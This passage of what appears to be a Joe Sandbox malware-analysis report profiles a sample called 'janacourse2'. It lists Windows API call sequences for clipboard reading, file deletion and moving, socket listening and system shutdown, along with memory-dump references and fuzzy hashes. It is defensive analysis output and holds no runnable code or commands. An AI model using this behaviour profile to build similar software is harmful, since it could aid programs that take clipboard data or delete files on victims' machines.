                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0102EB37
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0102EB43
                                                                                                            • CloseClipboard.USER32 ref: 0102EB4F
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0102EB87
                                                                                                            • CloseClipboard.USER32 ref: 0102EB91
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0102EBBC
                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0102EBC9
                                                                                                            • GetClipboardData.USER32(00000001), ref: 0102EBD1
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0102EBE2
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0102EC22
                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 0102EC38
                                                                                                            • GetClipboardData.USER32(0000000F), ref: 0102EC44
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0102EC55
                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0102EC77
                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0102EC94
                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0102ECD2
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0102ECF3
                                                                                                            • CountClipboardFormats.USER32 ref: 0102ED14
                                                                                                            • CloseClipboard.USER32 ref: 0102ED59
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 420908878-0
                                                                                                            • Opcode ID: 7cbf5d20d7217e42b3df862a640e67f4e1a78592563b632d17143f3c9db9f899
                                                                                                            • Instruction ID: 2983c88d30530794d0a664058de0386636881da3c433a122ed157a82a428fbc9
                                                                                                            • Opcode Fuzzy Hash: 7cbf5d20d7217e42b3df862a640e67f4e1a78592563b632d17143f3c9db9f899
                                                                                                            • Instruction Fuzzy Hash: 3961F3782443019FE311EF28CA84F6A7BE4EF84714F18455DF5D687292CB76E905CB62
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 010269BE
                                                                                                            • FindClose.KERNEL32(00000000), ref: 01026A12
                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01026A4E
                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01026A75
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 01026AB2
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 01026ADF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                            • Opcode ID: eb7c6a3da7833b83b21bc9c57f8fc36c27c8e91002e223b4e2fbeb50a81f7a2e
                                                                                                            • Instruction ID: da18783933ad18cacfcaf783b2b986d5206bca76be8508481c3595e20b63bf2e
                                                                                                            • Opcode Fuzzy Hash: eb7c6a3da7833b83b21bc9c57f8fc36c27c8e91002e223b4e2fbeb50a81f7a2e
                                                                                                            • Instruction Fuzzy Hash: 07D162B1508300AFC710EBA5CD92EABB7ECAF88704F44491DF989C7151EB79DA44DB62
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 01029663
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 010296A1
                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 010296BB
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 010296D3
                                                                                                            • FindClose.KERNEL32(00000000), ref: 010296DE
                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 010296FA
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0102974A
                                                                                                            • SetCurrentDirectoryW.KERNEL32(01076B7C), ref: 01029768
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 01029772
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0102977F
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0102978F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1409584000-438819550
                                                                                                            • Opcode ID: 61701949f08a40e52e0d223639dcb40aad0a0921929d2ce2d39f237b522d2537
                                                                                                            • Instruction ID: f6e79525d3946f0a811b4043733744778127a5ec2b6cd476c57f454013593269
                                                                                                            • Opcode Fuzzy Hash: 61701949f08a40e52e0d223639dcb40aad0a0921929d2ce2d39f237b522d2537
                                                                                                            • Instruction Fuzzy Hash: 643128715016396BFB20AEB9DE4CADE37ECAF09225F00409AF585E2080D735C984CB14
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 010297BE
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 01029819
                                                                                                            • FindClose.KERNEL32(00000000), ref: 01029824
                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 01029840
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01029890
                                                                                                            • SetCurrentDirectoryW.KERNEL32(01076B7C), ref: 010298AE
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 010298B8
                                                                                                            • FindClose.KERNEL32(00000000), ref: 010298C5
                                                                                                            • FindClose.KERNEL32(00000000), ref: 010298D5
                                                                                                              • Part of subcall function 0101DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0101DB00
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 2640511053-438819550
                                                                                                            • Opcode ID: facaafa5869e58cd475a16abcaed1489dac33a9088f3119a86e3e9b9897301fd
                                                                                                            • Instruction ID: 16f4d1888ad2b8a8f7bcaef28b51fc57bea7c1405021467de1b5e1326830c761
                                                                                                            • Opcode Fuzzy Hash: facaafa5869e58cd475a16abcaed1489dac33a9088f3119a86e3e9b9897301fd
                                                                                                            • Instruction Fuzzy Hash: ED312C31501639AFFF24EFB9DD489DE37BCAF05224F18409AE5C4A2190D775D944CB24
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 01028257
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 01028267
                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01028273
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01028310
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028324
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028356
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0102838C
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028395
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 1464919966-438819550
                                                                                                            • Opcode ID: f1c0ab3f7cbec30c31d1ec0cf4467f8eda3907df8a6dcd1fb8abeb582a131b17
                                                                                                            • Instruction ID: e4eb3b45567e0e7479ce3fe904b5145174d796d567b715f05283f5a83e08698e
                                                                                                            • Opcode Fuzzy Hash: f1c0ab3f7cbec30c31d1ec0cf4467f8eda3907df8a6dcd1fb8abeb582a131b17
                                                                                                            • Instruction Fuzzy Hash: 6D617BB65083159FD710EF64C8849AEB3E8FF89310F04895EF98987251EB39E945CF92
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB3A97,?,?,00FB2E7F,?,?,?,00000000), ref: 00FB3AC2
                                                                                                              • Part of subcall function 0101E199: GetFileAttributesW.KERNEL32(?,0101CF95), ref: 0101E19A
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0101D122
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0101D1DD
                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0101D1F0
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0101D20D
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101D237
                                                                                                              • Part of subcall function 0101D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0101D21C,?,?), ref: 0101D2B2
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0101D253
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0101D264
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                            • Opcode ID: 9267439773a4b1d986c6798ca1a43c53e008b1063b13e50ad50fc4623e8f0e3e
                                                                                                            • Instruction ID: b709127d25255e65580f4e451d8a45eae9aeca14505fd7950514486d2768a65e
                                                                                                            • Opcode Fuzzy Hash: 9267439773a4b1d986c6798ca1a43c53e008b1063b13e50ad50fc4623e8f0e3e
                                                                                                            • Instruction Fuzzy Hash: 5C61BC3180510DABDF05EBE5CE969EDBBB5AF21300F6440A5E48273195EB39AF09DF60
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1737998785-0
                                                                                                            • Opcode ID: 170e9ce573434552f090110c0607145c518a600fa1799902c794a4a36d2c2b0b
                                                                                                            • Instruction ID: ce5bb36b5124c816e440c5e406bcbb5f1c93ec6c5e3dd1b7b1706bccbec7ae8e
                                                                                                            • Opcode Fuzzy Hash: 170e9ce573434552f090110c0607145c518a600fa1799902c794a4a36d2c2b0b
                                                                                                            • Instruction Fuzzy Hash: C141B1752056219FE720DF19D588B19BBE5FF44318F04C099E49A8B762C77AFC41CB90
                                                                                                            APIs
                                                                                                              • Part of subcall function 010116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101170D
                                                                                                              • Part of subcall function 010116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101173A
                                                                                                              • Part of subcall function 010116C3: GetLastError.KERNEL32 ref: 0101174A
                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0101E932
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                            • Opcode ID: 082a78e72ede3c779087bf741de895e0704d24cc2117d50e89bdf8e358dbec02
                                                                                                            • Instruction ID: 8d7965e5fab195ea5c8befd5c48e50b912f173b2dc4d811c172e58e3a0e0dcfe
                                                                                                            • Opcode Fuzzy Hash: 082a78e72ede3c779087bf741de895e0704d24cc2117d50e89bdf8e358dbec02
                                                                                                            • Instruction Fuzzy Hash: 80014972A10311ABFB6622B8DD85FFF729DAB18740F040822FDC3E20C5D5AE5C4082A4
                                                                                                            APIs
                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01031276
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031283
                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 010312BA
                                                                                                            • WSAGetLastError.WSOCK32 ref: 010312C5
                                                                                                            • closesocket.WSOCK32(00000000), ref: 010312F4
                                                                                                            • listen.WSOCK32(00000000,00000005), ref: 01031303
                                                                                                            • WSAGetLastError.WSOCK32 ref: 0103130D
                                                                                                            • closesocket.WSOCK32(00000000), ref: 0103133C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 540024437-0
                                                                                                            • Opcode ID: 27eb58b121116f5bcf0cdb7cdc06c5a6a1bf6644f6b5e0a9ac528cdaba4efdb0
                                                                                                            • Instruction ID: 57681a1459f29723688fd94c92e32a3af677d52dc03ece6867e1f1d76badd4a0
                                                                                                            • Opcode Fuzzy Hash: 27eb58b121116f5bcf0cdb7cdc06c5a6a1bf6644f6b5e0a9ac528cdaba4efdb0
                                                                                                            • Instruction Fuzzy Hash: B94174756001009FE720DF68C584B69BBE9AF8A314F1881D8D9969F296C775EC81CBE1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB3A97,?,?,00FB2E7F,?,?,?,00000000), ref: 00FB3AC2
                                                                                                              • Part of subcall function 0101E199: GetFileAttributesW.KERNEL32(?,0101CF95), ref: 0101E19A
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0101D420
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0101D470
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101D481
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0101D498
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0101D4A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                            • Opcode ID: 197dddd29e7a60e36e5f0430b5ed17c4875173953ea73d5e36a712df7620f7d4
                                                                                                            • Instruction ID: 14245ac66da7f797f750bd2509420cd7a553ce117dd0b7a06f7514006e16265b
                                                                                                            • Opcode Fuzzy Hash: 197dddd29e7a60e36e5f0430b5ed17c4875173953ea73d5e36a712df7620f7d4
                                                                                                            • Instruction Fuzzy Hash: D631CE71048341ABC301EFA5CD958EFB7E8BE91200F844A1DF4D583191EF28EA09DB63
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __floor_pentium4
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                            • Opcode ID: fb2fba032dcd31ed223f15a0b151ce5829953f7eb94ff37bcfede494ad11d160
                                                                                                            • Instruction ID: 0c572fc91ca07f5a8f9a6e7029b674f6ba382b50af06c05b4823156c002fa39e
                                                                                                            • Opcode Fuzzy Hash: fb2fba032dcd31ed223f15a0b151ce5829953f7eb94ff37bcfede494ad11d160
                                                                                                            • Instruction Fuzzy Hash: 86C26D72E046688FDB25CF29DD407EAB7B5EB88314F1441EAD44DE7240E778AE859F40
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 010264DC
                                                                                                            • CoInitialize.OLE32(00000000), ref: 01026639
                                                                                                            • CoCreateInstance.OLE32(0104FCF8,00000000,00000001,0104FB68,?), ref: 01026650
                                                                                                            • CoUninitialize.OLE32 ref: 010268D4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 886957087-24824748
                                                                                                            • Opcode ID: 2f2386f607ede22d918b2559b83e9e03c18cb429e00c8fed8e03d8ec69d63cd3
                                                                                                            • Instruction ID: 2bad5379ee06c184e10ff9ef8fd3686820bfe3d40367ede82c37e577ecd184ad
                                                                                                            • Opcode Fuzzy Hash: 2f2386f607ede22d918b2559b83e9e03c18cb429e00c8fed8e03d8ec69d63cd3
                                                                                                            • Instruction Fuzzy Hash: 15D16A71508311AFD314EF25C881EABBBE8FF98304F10496DF5958B291EB75E905CBA2
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 01029B78
                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 01029C8B
                                                                                                              • Part of subcall function 01023874: GetInputState.USER32 ref: 010238CB
                                                                                                              • Part of subcall function 01023874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01023966
                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 01029BA8
                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 01029C75
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
